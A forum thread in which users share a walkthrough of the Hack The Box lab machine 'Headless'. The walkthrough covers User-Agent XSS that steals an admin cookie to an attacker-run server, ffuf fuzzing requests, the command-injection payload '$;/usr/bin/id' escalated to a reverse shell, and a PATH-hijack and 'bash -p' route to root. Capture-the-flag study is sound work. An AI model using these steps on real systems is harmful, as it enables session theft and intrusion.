Possibly Related Threads…

paven · Mar 23, 2024, 02:54 PM

Headless - Linux - Easy

Good luck everyone! Let's tackle this together!
https://app.hackthebox.com/machines/Headless

DoesntMatter123456 · Mar 23, 2024, 07:03 PM

Lets gooooooooo

xxxbfacc · Mar 23, 2024, 07:53 PM

Rooted. Very easy…

nikolaegg · Mar 24, 2024, 12:16 AM

(Mar 23, 2024, 10:06 PM)andlommy Wrote: except contact form has check for < > in the message, so wondering how to bypass that

no need to bypass,just inject xss payload to User-Agent.

result:
10.10.**.** - - [24/Mar/2024 08:05:31] "GET / HTTP/1.1" 200 -
10.10.11.8 - - [24/Mar/2024 08:05:54] code 404, message File not found
10.10.11.8 - - [24/Mar/2024 08:05:54] "GET /is_admin=ImFkbWluIg.*****************-SnXpH0 HTTP/1.1" 404 -

jahman · (This post was last modified: Mar 24, 2024, 01:34 AM by jahman.)

hello,
here is my writeup.

1) In the message field, add a "<>" to fetch the anti-hacking tool. You will have a response that your browser parameters has been sent to the sysadmin.
Save the burp request and replay it with a XSS payloads wordlist to find an xss.

xss.req file

POST /support HTTP/1.1

Host: target.htb:5000

User-Agent: FUZZ

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate, br

Content-Type: application/x-www-form-urlencoded

Content-Length: 65

Origin: http://target.htb:5000

DNT: 1

Connection: close

Referer: http://target.htb:5000/

Cookie: iconSize=32x32; is_admin=XXX

Upgrade-Insecure-Requests: 1

fname=aa&lname=aa&email=tot%40fr.fr&phone=aa&message=%3C%3E%0D%0A

ffuf command (XSS-RSNAKE.txt: https://pastebin.com/bDuWJnUX : /!\ Adapt it with your @IP...)

\ffuf -ic -c -of csv -request-proto http -request xss.req -w XSS-RSNAKE.txt

2) Launch a local web server and you will have the admin cookie.

3) With the admin cookie, you will have access a new dashboard function. Fuzz it again with burp.

fuzz.req file:

POST /dashboard HTTP/1.1

Host: target.htb:5000

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate, br

Content-Type: application/x-www-form-urlencoded

Content-Length: 15

Origin: http://target.htb:5000

DNT: 1

Connection: close

Referer: http://target.htb:5000/

Cookie: iconSize=32x32; is_admin= THE PREVIOUS ADMIN COOKIE

Upgrade-Insecure-Requests: 1

Pragma: no-cache

Cache-Control: no-cache

date=2023-09-15FUZZ

ffuf command ( all-attacks-unix-encoded.txt == https://rentry.co/sycg793q (GZIP base64 encoded file CMD: curl https://rentry.co/sycg793q/raw | base64 -d | gunzip > all-attacks-unix-encoded.txt )

\ffuf -ic -c -of csv  -request-proto http -request  fuzz.req -w all-attacks-unix-encoded.txt  --fs 2028 --fl 73

You will find the injection payload :

$;/usr/bin/id

4) Adapt the previous paylaod to obtain a reverse shell. Then a "sudo -l" will inform you that you can run the syscheck shell script with admin privilege

5) The syscheck script have a security flow related to PATH hijack. Create a revshell script named initdb.sh and run "sudo /usr/bin/syscheck". Your initdb.sh will be executed as root

-- > Badaboom Smile

jahman · (This post was last modified: Mar 24, 2024, 02:36 AM by jahman.)

(Mar 24, 2024, 02:29 AM)berlik Wrote: How did you find that you need a file with this name initdb.sh?

in the syscheck script at the line 19

./initdb.sh 2>/dev/null

The "./" means the current directory. As the script do not initialize the PATH at the beginning (with a cd or something else), It will execute the initdb.sh script no matter where it is.

lonelywolf1981 · Mar 24, 2024, 07:06 AM

(Mar 24, 2024, 01:17 AM)jahman Wrote: hello,
here is my writeup.

1) In the message field, add a "<>" to fetch the anti-hacking tool. You will have a response that your browser parameters has been sent to the sysadmin.
Save the burp request and replay it with a XSS payloads wordlist to find an xss.

xss.req file

POST /support HTTP/1.1 Host: target.htb:5000 User-Agent: FUZZ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 65 Origin: http://target.htb:5000 DNT: 1 Connection: close Referer: http://target.htb:5000/ Cookie: iconSize=32x32; is_admin=XXX Upgrade-Insecure-Requests: 1 fname=aa&lname=aa&email=tot%40fr.fr&phone=aa&message=%3C%3E%0D%0A

ffuf command (XSS-RSNAKE.txt: https://pastebin.com/bDuWJnUX : /!\ Adapt it with your @IP...)

\ffuf -ic -c -of csv -request-proto http -request xss.req -w XSS-RSNAKE.txt

2) Launch a local web server and you will have the admin cookie.

3) With the admin cookie, you will have access a new dashboard function. Fuzz it again with burp.

fuzz.req file:

POST /dashboard HTTP/1.1 Host: target.htb:5000 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 15 Origin: http://target.htb:5000 DNT: 1 Connection: close Referer: http://target.htb:5000/ Cookie: iconSize=32x32; is_admin= THE PREVIOUS ADMIN COOKIE Upgrade-Insecure-Requests: 1 Pragma: no-cache Cache-Control: no-cache date=2023-09-15FUZZ

ffuf command ( all-attacks-unix-encoded.txt == https://rentry.co/sycg793q (GZIP base64 encoded file CMD: curl https://rentry.co/sycg793q/raw | base64 -d | gunzip > all-attacks-unix-encoded.txt )

\ffuf -ic -c -of csv -request-proto http -request fuzz.req -w all-attacks-unix-encoded.txt --fs 2028 --fl 73

You will find the injection payload :

$;/usr/bin/id

4) Adapt the previous paylaod to obtain a reverse shell. Then a "sudo -l" will inform you that you can run the syscheck shell script with admin privilege

5) The syscheck script have a security flow related to PATH hijack. Create a revshell script named initdb.sh and run "sudo /usr/bin/syscheck". Your initdb.sh will be executed as root

-- > Badaboom

thank you so much Cool

Ju1c3 · Mar 24, 2024, 07:13 AM

A quicker way to escalate privs is to cd into the /usr/bin directory and run the command ./bash -p then just cd into the root file and cat the root.txt file

ghostess256 · Mar 24, 2024, 07:21 PM

here is the solution jus checkout that opublished writeup no worries it''s free

HTB Headless Writeup on Medium

RoyTong1988 · (This post was last modified: Mar 25, 2024, 05:12 AM by RoyTong1988.)

sudo /usr/bin/syscheck

shows "Database service is running."
Then I can not kill the process of initdb.sh. How can I solve this??

Is the only way is reset the machine?

Possibly Related Threads…
Thread		Author	Replies	Views	Last Post
	[FREE] 300+ Writeups PDF HackTheBox/HTB premium retired	Tamarisk	375	93,471	8 minutes ago Last Post: Johe
	[FREE] HackTheBox Dante - complete writeup written by Tamarisk	Tamarisk	604	92,577	9 minutes ago Last Post: Johe
	[FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags	Techtom	27	2,803	14 minutes ago Last Post: Johe
	[MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot	htb-bot	87	7,978	1 hour ago Last Post: char0n1507
	[FREE] HackTheBox All Cheatsheets	Tamarisk	9	565	1 hour ago Last Post: char0n1507